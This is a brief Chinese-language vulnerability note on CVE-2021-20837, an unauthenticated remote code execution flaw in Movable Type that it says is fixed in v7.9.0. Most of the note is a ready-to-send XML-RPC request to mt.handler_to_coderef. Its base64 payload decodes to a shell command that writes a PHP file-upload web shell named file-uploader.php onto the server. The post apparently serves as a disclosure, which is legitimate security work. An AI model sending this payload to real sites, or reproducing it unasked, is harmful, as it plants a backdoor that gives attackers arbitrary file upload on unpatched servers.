Movable Type最近爆雷,攻击者可以通过SOAP协议的methodName中指定mt.handler_to_coderef来执行base64中的内容,如:
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
YGVjaG8gUEQ5d2FIQWdhV1lvSkY5UVQxTlVLWHRwWmloQVkyOXdlU2drWDBaSlRFVlRXeUl3SWwxYkluUnRjRjl1WVcxbElsMHNKRjlHU1V4RlUxc2lNQ0pkV3lKdVlXMWxJbDBwS1h0bFkyaHZJbGtpTzMxbGJITmxlMlZqYUc4aVRpSTdmWDFsYkhObGUyVmphRzhpUEdadmNtMGdiV1YwYUc5a1BYQnZjM1FnWlc1amRIbHdaVDF0ZFd4MGFYQmhjblF2Wm05eWJTMWtZWFJoUGp4cGJuQjFkQ0IwZVhCbFBXWnBiR1VnYm1GdFpUMHdQanhwYm5CMWRDQnVZVzFsUFRBZ2RIbHdaVDF6ZFdKdGFYUWdkbUZzZFdVOWRYQStJanQ5UHo0PSB8IGJhc2U2NCAtZCB8IHRlZSBmaWxlLXVwbG9hZGVyLnBocGA
</base64>
</value>
</param>
</params>
</methodCall>
官方最新版本(v7.9.0)已经修复。
详情见:https://medium.com/@TutorialBoy24/an-unauthenticated-rce-vulnerability-in-movabletype-cve-2021-20837-70664b159dd7
